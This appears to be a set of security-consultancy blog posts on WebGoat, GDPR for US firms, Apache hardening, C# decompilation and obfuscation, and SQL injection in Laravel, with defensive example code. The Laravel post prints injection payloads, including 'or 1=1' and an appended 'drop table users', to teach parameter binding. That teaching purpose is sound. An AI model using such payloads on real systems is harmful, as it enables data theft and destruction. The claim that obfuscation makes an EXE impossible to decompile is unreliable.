WebGoat is a deliberately insecure application that allows interested developers just like you to test vulnerabilities commonly found in Java-based applications that use common and popular open source components. Web application security is difficult to learn and practice. Not many people have full-blown web applications like online book stores or online banks that can be used to scan for vulnerabilities. Security professionals frequently need to test tools against a platform known to be vulnerable to ensure that they perform as advertised. All of this needs to happen in a safe and legal environment.

What about RootMe?

RootMe offers a simple, fast and affordable platform to test your hacking skills. It is an easy-to-use website: you just have to sign up on the website, and you are good to go. With just a few clicks, you will access different virtual environments.

If you have any doubts about this topic, or need advice and the best services and consultation against cyber threats, feel free to contact us. AIRZERO SEC will be your strong firewall. Email id: [email protected]


The General Data Protection Regulation is a legal framework that sets rules for the collection and processing of personal information from individuals who live in the European Union. Since the Regulation applies regardless of where websites are based, it must be heeded by all websites that attract European visitors, even if they don't specifically market goods or services to European Union residents.

The GDPR mandates that European Union visitors be given a number of data disclosures. The website must also take steps to facilitate European Union consumer rights such as timely notification in the event of personal data being breached. Adopted in April 2016, the Regulation came into full effect in May 2018, after a two-year transition period.

What are the Customer-Service Requirements of the GDPR?

Under the rules, visitors must be told what data the site collects from them and must explicitly consent to that data gathering, by clicking on an Agree button or other action. Websites must also notify users in a timely way if any of their personal data held by the site is breached. These European Union requirements may be more stringent than those required in the jurisdiction in which the website is located.

Also mandated is an assessment of the site's data security, and of whether a dedicated data protection officer needs to be hired to carry out this function.

Information on how to contact the Data Protection Officer and other relevant staff must be accessible so that visitors may exercise their European Union data rights, which also include the ability to have their presence on the site erased, among other measures.

Does GDPR Apply to US Companies?

The GDPR applies to US businesses, regardless of their size in terms of revenue or staff, if any of the conditions below are satisfied:

  • The company offers goods to EU and EEA residents.
  • The company monitors the behavior of users inside the EU and EEA.

Personal data and behavior covered by the GDPR include names, contact details, device information, biometric information, photographs, and more.

GDPR compliance requirements vary depending on the activities of the company. For example, businesses with fewer than 250 employees do not need to maintain a record of processing activities. However, this exemption applies only if the processing is not likely to pose a risk to the rights and freedoms of the data subjects and no special categories of data are processed.

Does GDPR Apply to US Citizens?

Depending on where they are located, the GDPR can also apply to US citizens.

The GDPR uses the term data subject to refer to the person whose data is being processed. Under most interpretations of the GDPR, whether the GDPR applies depends on where the data subject is when their data is processed, and not on the citizenship of the data subject.

Does GDPR Apply to the US Government?

The GDPR does not make blanket exceptions for governmental agencies. Therefore, if the US government targets or processes the personal data of EU and EEA-based users, it will be expected to comply with the GDPR. This is true for all non-EU and EEA public agencies. The GDPR does afford a few exemptions to member states of the EU and EEA.

One such exemption is that government agencies are excused from complying with certain provisions of the GDPR so long as personal data is processed in the public interest, such as for preventing and prosecuting criminal offenses or threats to public safety.

GDPR Requirements for US Companies

In the event that a US company is required to comply with the GDPR, it is expected to meet the same strict requirements that companies located in the EU are expected to meet.

The text of the GDPR is quite extensive, and ensuring compliance can be daunting. For organizations that must comply with the GDPR, the following are the key requirements and features:

  1. Data Breach Notifications
  2. Data Protection Impact Assessments
  3. Privacy by Design
  4. Strict Consent Conditions
  5. Data Subject Access Requests
  6. Appointing a Data Protection Officer

GDPR Enforcement in the US

In Europe, enforcement of the GDPR rests with the numerous supervisory authorities in the EEA and Switzerland. There are several mechanisms through which the GDPR can be enforced in the US.

  1. If the company has a presence or assets in the EU and EEA, these can be seized for GDPR noncompliance.
  2. For companies without a physical presence in the EU and EEA, the GDPR mandates the appointment of a representative who is physically located within the EU and EEA. In cases of GDPR noncompliance, this person would be a likely channel through which fines are levied.
  3. International law is another channel through which legal action can be taken. Given that it is mutually beneficial for national enforcement agencies to support each other, punitive actions may be pursued by the EU and EEA enforcement agencies. These agencies are likely to be assisted by public organizations in the country where the company is registered.

To sum up, especially for multinational companies, noncompliance will be pursued aggressively by the EU and EEA enforcement agencies.

GDPR Fines for US Companies

The national enforcement agencies of the various EU and EEA countries have the legal means to impose fines and penalties for noncompliance on companies located outside their territory.

Conclusion

Whether the GDPR applies depends on where the data subject is when their data is processed, not on the citizenship or nationality of the data subject. Any US company that serves customers in the EU and EEA — or tracks their behavior within this region — must fully comply with the GDPR.

If you have any questions about the above topic or need services and consultations against any serious cyber threat, feel free to contact us. AIRZERO SEC will be your strong cyber partner. E-mail id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


Before we get into the topic itself, we first need to cover some basics, such as installing Apache and a few fundamental concepts, so let’s start with the installation.

How to install Apache on Ubuntu?

This section will help you install the Apache web server on the Ubuntu operating system.

Before beginning your work:

  • A running Ubuntu system with privileged shell access
  • The initial server setup instructions completed
  • A registered domain name pointed to your server’s public IP address

Step 1 — Installing Apache

Apache is available in the default software repositories on Ubuntu, so you can install it using the conventional package management tool. First, update the local package index to reflect the latest upstream changes, then install the Apache web server. After you confirm, apt will install Apache and its required dependencies on your system.

Step 2 — Test Your Web Server

After the installation is finished, the Apache service will automatically start on your system. You can find the Apache status by running the following command:

$ sudo systemctl status apache2

When the output shows a status like “Active: active (running)”, the Apache service has started correctly. However, the best way to test a web server is to request a page from Apache in a web browser. If you see the Apache landing page, the Apache web server is running correctly on your system.

Next, we need to know how to secure Apache on Ubuntu. Follow this article for some tips to strengthen the security of your Apache web server.

Tips To Strengthen Your Apache Web Server Security:

  • Hide the Apache version and OS identity from error pages
  • Disable directory listing
  • Keep Apache updated regularly
  • Disable unnecessary modules
  • Run Apache as a separate user and group
  • Use Allow and Deny to restrict access to directories

How To Hide The Apache Version And OS Identity From Errors?

When you install Apache with a package installer such as yum, error pages reveal which version of the Apache web server is installed on your server along with the name of the server’s operating system. They can also reveal details about the Apache modules installed on your server.

As you can see above, Apache is revealing its version and that it runs on Ubuntu. This is a significant security problem for your web server and for your Linux box as a whole. To stop Apache from displaying this information to the world, we need to make some changes in Apache’s main configuration file.

Open the configuration file and search for “ServerSignature”; by default it will be On. Set it to Off. The second directive, “ServerTokens Prod”, tells Apache to return only “Apache” in the Server response header on every page request; it suppresses the Ubuntu, major and minor version information.

How to disable directory listing?

By default, Apache lists the contents of the document root directory when no index file is present. We can turn off directory listing by using the Options directive in the configuration file for a specific directory. For that, we need to make a change in the httpd.conf file...

How To Keep Updating Apache Regularly?

Apache developers are continuously working on security problems and releasing updated versions with a variety of security improvements, so it is always recommended to run the latest version of Apache as your web server.

To check which Apache version you are running, use the httpd -v command (apache2 -v on Ubuntu).

How To Disable Unnecessary Modules?

It’s always good to reduce the chances of becoming the victim of a cyber attack, so it is recommended to remove all modules that are not in use. You can list all the modules loaded by the web server with the following command.

# grep LoadModule /etc/httpd/conf/httpd.conf
# have to place corresponding `LoadModule' lines at this location so the
# LoadModule foo_module modules/mod_foo.so
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_alias_module modules/mod_authn_alias.so
LoadModule authn_anon_module modules/mod_authn_anon.so
LoadModule authn_dbm_module modules/mod_authn_dbm.so
LoadModule authn_default_module modules/mod_authn_default.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_owner_module modules/mod_authz_owner.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_dbm_module modules/mod_authz_dbm.so
LoadModule authz_default_module modules/mod_authz_default.so
LoadModule ldap_module modules/mod_ldap.so
LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
LoadModule include_module modules/mod_include.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule logio_module modules/mod_logio.so
LoadModule env_module modules/mod_env.so
LoadModule ext_filter_module modules/mod_ext_filter.so

The list above shows modules that are enabled by default but often not needed, such as mod_imap, mod_include, mod_info, mod_userdir and mod_autoindex. To disable a module, insert a “#” at the beginning of its LoadModule line and restart the service (on Ubuntu, a2dismod <module> does the same).

How To Run Apache As A Separate User And Group?

With a default installation, Apache runs its processes as the user nobody or daemon. For security reasons, it is recommended to run Apache under its own non-privileged account, for example http-web.

Create Apache User and Group

# groupadd http-web
# useradd -d /var/www/ -g http-web -s /usr/sbin/nologin http-web

Now you need to tell Apache to run as this user; to do so, we make a change in /etc/httpd/conf/httpd.conf and restart the service.

Open /etc/httpd/conf/httpd.conf in an editor, search for the keywords “User” and “Group”, and specify the username and group name to use (they must match the account created above exactly, since Linux usernames are case-sensitive).

User http-web
Group http-web

How to use Allow and Deny to restrict access to directories?

We can restrict access to directories with the “Allow” and “Deny” directives in the httpd.conf file. In the example below we secure the root directory by setting the following in httpd.conf (on Apache 2.4 the Order and Deny directives require mod_access_compat; the native equivalent is Require all denied):

<Directory />
Options None
Order deny,allow
Deny from all
</Directory>

  • Options “None” – does not allow users to enable any optional features.
  • Order deny,allow – sets the order in which the “Deny” and “Allow” directives are processed; here the “Deny” rules are evaluated first, then “Allow”.
  • Deny from all – denies requests from everybody to the root directory, so nobody will be able to access it.
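As an added check that is not part of the original post, the following Python script audits an httpd.conf fragment against the tips above (server signature and tokens, directory listing, rarely needed modules, a dedicated User and Group, and a denied root directory); the configuration fragments are constructed examples, and the script recognises both “Deny from all” and the Apache 2.4 form “Require all denied”.

```python
import re
# Constructed httpd.conf fragment (not from a real server) mixing weak and hardened settings.
WEAK_CONF = """\
ServerTokens OS
ServerSignature On
User nobody
Group nobody
LoadModule autoindex_module modules/mod_autoindex.so
<Directory /var/www/html>
    Options Indexes FollowSymLinks
</Directory>
<Directory />
    Options None
    Order deny,allow
    Deny from all
</Directory>
"""
# The same fragment after applying the tips, using the Apache 2.4 form of "Deny from all".
HARDENED_CONF = """\
ServerTokens Prod
ServerSignature Off
User http-web
Group http-web
<Directory />
    Require all denied
</Directory>
"""
RARELY_NEEDED = {"imap_module", "include_module", "info_module", "userdir_module", "autoindex_module"}  # per the post
SHARED_ACCOUNTS = {"root", "nobody", "daemon"}

def parse_directives(text):
    """Yield (directive, value, section); section is the enclosing <Directory> path or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"<Directory\s+(\S+?)\s*>", line, re.I)
        if m:
            section = m.group(1)
            continue
        if line.lower() == "</directory>":
            section = None
            continue
        name, _, value = line.partition(" ")
        yield name.lower(), value.strip(), section

def audit_apache_conf(text):
    """Return one finding per violated tip; an empty list means the fragment passes."""
    findings, seen, root_denied = [], {}, False
    for name, value, section in parse_directives(text):
        if name in ("servertokens", "serversignature", "user", "group"):
            seen[name] = value
        elif name == "loadmodule" and value.partition(" ")[0] in RARELY_NEEDED:
            findings.append(f"module {value.partition(' ')[0]} is loaded but rarely needed")
        elif name == "options" and "indexes" in value.lower().split():
            findings.append(f"directory listing enabled in <Directory {section}>")
        elif section == "/" and (name, value.lower()) in (("deny", "from all"), ("require", "all denied")):
            root_denied = True
    if seen.get("servertokens", "Full").lower() != "prod":  # Apache's built-in default is Full
        findings.append("ServerTokens is not Prod")
    if seen.get("serversignature", "").lower() != "off":
        findings.append("ServerSignature is not set to Off")
    for acct in ("user", "group"):
        if seen.get(acct, "").lower() in SHARED_ACCOUNTS | {""}:
            findings.append(f"{acct} is not a dedicated account")
    if not root_denied:
        findings.append("<Directory /> does not deny all access")
    return findings
```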

A good cyber security consulting company will provide the security solutions your system needs; partner with the best cyber security service provider.

If you have any queries about this topic or need cybersecurity services and consultations against these serious cyber attacks, feel free to contact us. AIRZERO SEC will always be your strong firewall. E-mail id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


Many developers and programmers are still not aware that Portable Executable files can be decompiled into readable source code. Before discussing what we can do to stop, or at least hinder, decompilers from reverse engineering the source code, we need to understand some basic concepts. A cybersecurity consulting company can help you find the best-secured way to avoid decompilation of your application.

Is C# easy to decompile?

C# is easy to decompile because its assemblies contain metadata that aids decompilation. C# also compiles down to an intermediate language (CIL) that maps much more closely to the original source code, so it is easy to decompile. Typically, far more information about the original source, such as object-oriented concepts including class structure, can be gleaned from reading the CIL than from reading native machine code.

How to prevent decompilation against C# applications?

One way to make a C# application a little harder to crack is to deliver it as a program that decrypts its instructions and compiles and runs them only when needed. This way, even if someone finds where the actual code is stored, it will still be encrypted, and without a license it is unusable.

What is a Portable Executable file?

When source code is compiled, it generates a Portable Executable file, which is either a DLL or an EXE. A Portable Executable file contains Microsoft Intermediate Language and metadata. The intermediate language is ultimately converted by the CLR into native code that the processor can understand. The metadata contains assembly information such as the assembly name, version, culture and public key. Consult a cyber security solution that makes your application safe and portable.

How Can We Get Source Code from EXE?

Yes, you read that right: we can get the source code back from a DLL or EXE. To show this, let's create a simple app first.

The steps to develop the application are:

  • Open Visual Studio
  • Create a new project
  • Select a console-based application
  • Add some code to the newly created project

For example, start with the sample code below:

using System;

namespace MyConsoleApp
{
    internal class Program
    {
        private static void Main(string[] args)
        {
            Console.WriteLine(PublicMethod());
            Console.WriteLine(PrivateMethod());
        }

        public static string PublicMethod()
        {
            // Your source code here
            return "Public Method";
        }

        private static string PrivateMethod()
        {
            // Your source code here
            return "Private Method";
        }
    }
}

Now build the application; an EXE will be generated in the bin/Debug folder. Let's try to get the code back from the EXE file:

  • Open the Visual Studio command prompt.
  • Type ildasm and hit Enter (ILDASM is the IL disassembler; it reads intermediate language).
  • Open the EXE file that was created.

As we can see, ILDASM disassembles the EXE and a lot of useful information can be read from it. Although it does not give back the original code completely, a lot can be learned from it. The easier way to reverse engineer an assembly and recover the code is to use one of the freely available decompilers, which convert the intermediate language back into source code close to the original.

When we open the EXE with a decompiler we are able to see the original code. This can lead to piracy, and you can lose your profits.

How to Prevent EXE from Getting Decompiled?

The process of protecting an EXE or DLL from being decompiled back into the original code is called obfuscation. There is a lot of software available to obfuscate .NET assemblies. The settings below are for ConfuserEx.

  • Download the obfuscation software (ConfuserEx), which is available online.
  • Extract the zip and run it.
  • Select the EXE you want to protect.
  • Once you are done setting up the directories and adding the EXE, go to the Settings tab.
  • Click on the “+” button; you will see “true” under Rules.
  • Click on Edit rule.
  • A new window will appear.
  • Click on the “+” button.
  • You can choose different protections to add levels of protection.
  • Select only “Anti IL Dasm” and “Anti Tamper” (this is enough to make things hard for decompilers to reverse engineer).
  • Click on Done.
  • Go to the Protect tab.
  • Click on the Protect button.
  • You can find the protected EXE in the selected output directory.

ALL SET! Now you see your EXE cannot be decompiled anymore.

If you have any queries about this topic or need cybersecurity services and consultations against these serious cyber attacks, feel free to contact us. AIRZERO SEC will always be your strong firewall. E-mail id: [email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


What Is SQL Injection?

SQL Injection is a type of cyber attack that makes it possible to execute malicious SQL statements. These statements control the database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures: they can get around the authentication of a web page and retrieve the contents of the whole SQL database. They can also use SQL Injection to add, delete and modify records in the database. The best cyber security company you approach will always provide the best protection for your database against SQL injection and other attacks.

An SQL Injection vulnerability may affect any website that uses an SQL database such as MySQL, Oracle or others. Criminals may use it to gain unauthorized access to your personal and highly sensitive data, such as:

  • Customer information
  • Personal data
  • Trade secrets
  • Intellectual property and more

SQL Injection attacks are among the oldest and most dangerous web application vulnerabilities. Cyber security service providers can help you with this serious problem.

Why Laravel Framework?

Laravel is a web application development framework with expressive and elegant syntax that makes the entire web development process faster, simpler and more enjoyable for developers by removing the pain points associated with handling complex PHP code.

It simplifies commonly executed tasks such as routing, authentication, sessions and caching so that developers can focus on building the business features of the web application. Laravel protects web apps from SQL injection as long as you use the fluent query builder.

Laravel does this by using prepared statements, which escape any user input that comes into the app. If attackers add input to a form, they may try to insert their own SQL query to damage your application’s database. However, this will not work while you are using Eloquent: Eloquent protects against the injected SQL, and the invalid query is simply stored as text in your database.

What Are The Types Of SQL Injection Attack Vectors That Laravel Can’t Protect?

Developers often make the mistake of thinking that Laravel protects against all SQL injection attacks, but there are some attack points Laravel cannot protect. Below are the most common causes of SQL injection that we saw in recent Laravel applications during our security checks.

SQL Injection via column name

The first common mistake we see is that many people think Laravel would escape any parameter passed to the Query Builder or Eloquent. In reality, it is not safe to pass user-controlled column names to the query builder.

It is important to mention that the demonstrated attack point is fixed in current Laravel versions, but Laravel still warns developers, even in the latest documentation, not to pass user-controlled column names to the Query Builder without whitelisting.

In general, even if there is no way to turn a custom column name into an injected SQL string, we still do not recommend allowing the data to be sorted by any user-provided column name, since it can introduce a serious security issue.

SQL Injection via validation rules

Let’s take a look at the following simplified validation code:

$id = $request->route('id');
$rules = ['username' => 'required|unique:users,name,' . $id];

$validator = Validator::make($request->post(), $rules);

Because Laravel uses $id here in a query against the database and $id is not escaped, an attacker can perform an SQL injection through it.

How to prevent SQL injection in Laravel?

Laravel’s Eloquent ORM uses PDO parameter binding, which protects web apps from SQL injection. This feature ensures that no client can modify the intent of the SQL queries.

Consider the example of a form used to look up users’ email addresses in the database. The form searches for an email address, for instance “[email protected]”. Now imagine that the SQL query is modified to:

SELECT * FROM users WHERE email = '[email protected]' or 1=1

In the above example, 1=1 is a simple expression that always evaluates to true. When it is attached to the query with an OR condition, the query will fetch all records from the table because the WHERE condition will always evaluate to true.

Now consider another direction of attack in which the command “drop table users” is appended directly to the query after the email address “[email protected]”. The query will look like this:

SELECT * FROM users WHERE email = '[email protected]'; drop table users;

When this query is executed, the table “users” will be deleted from the database.

When PDO parameter binding is in place, the whole input is treated as a single quoted string and the query will look like this:

SELECT * FROM users WHERE email = '[email protected] or 1=1'

Since no record matches the literal string containing both the email and the “1=1”, the query returns nothing.

This framework provides other ways of talking to databases, such as raw SQL queries. Yet, Eloquent remains one of the most popular options.

The Laravel framework uses PDO binding to prevent SQL injection attacks, so no variable reaches the database unchecked.

Even so, one should always use prepared SQL queries to prevent injection. Consider the following statement, which looks ripe for SQL injection:

Route::get('this-is-prone-to-sql-injection', function() {
    $name = "'ancy' OR 1=1";
    return DB::select(
        DB::raw("SELECT * FROM users WHERE name = $name"));
});

Here the statement 1=1 used in the OR condition will result in returning all the rows in the users table. This can be prevented by using the following code instead:

Route::get('safe-from-sql-injection', function() {
    $name = "'ancy' OR 1=1";
    // DB::select() accepts the bindings array; DB::raw() takes no bindings.
    return DB::select("SELECT * FROM users WHERE name = ?", [$name]);
});

Laravel replaces the question mark with the bound value, automatically escaping the input variable. This protects the query from SQL injection attacks.
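As an added example, not from the original post or from Laravel itself, the following Python code uses the sqlite3 module’s parameter binding in place of Laravel’s PDO binding to show the three points discussed above: the 'ancy' OR 1=1 payload returning every row when interpolated and no rows when bound, an allow-list for user-supplied sort columns (which cannot be bound), and the unique-rule case with the id validated as an integer. The users table and its rows are constructed sample data.

```python
import sqlite3

# Constructed sample rows (not from the original post); ids are assigned 1, 2, 3 in this order.
SEED_USERS = [("ancy", "ancy@example.com"), ("bob", "bob@example.com"), ("carol", "carol@example.com")]
# Column names cannot be bound as parameters, so sorting is restricted to this allow-list.
SORTABLE_COLUMNS = {"id", "name", "email"}

def make_db():
    """In-memory users table standing in for the Laravel application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)", SEED_USERS)
    return conn

def find_by_name_unsafe(conn, name):
    """The defect from the post: the value is interpolated into the SQL text."""
    return [r[0] for r in conn.execute(f"SELECT name FROM users WHERE name = {name}")]

def find_by_name_safe(conn, name):
    """Parameter binding, like Laravel's ? placeholder: the value never becomes SQL."""
    return [r[0] for r in conn.execute("SELECT name FROM users WHERE name = ?", (name,))]

def list_users_sorted(conn, column):
    """Whitelist the user-supplied sort column before it is placed in ORDER BY."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"sort column not allowed: {column!r}")
    return [r[0] for r in conn.execute(f"SELECT name FROM users ORDER BY {column}")]

def name_is_unique(conn, name, ignore_id):
    """Equivalent of the unique:users,name,<id> rule with the id validated as an integer."""
    if not isinstance(ignore_id, int):
        raise ValueError("ignore_id must be an integer, not user-controlled text")
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND id != ?"
    return conn.execute(sql, (name, ignore_id)).fetchone()[0] == 0
```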

If you have any queries about this topic or need services and consultations against this serious cyber threat, feel free to contact us. AIRZERO SEC will be your strong firewall.
E-mail id: [email protected]

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/
Email id: [email protected]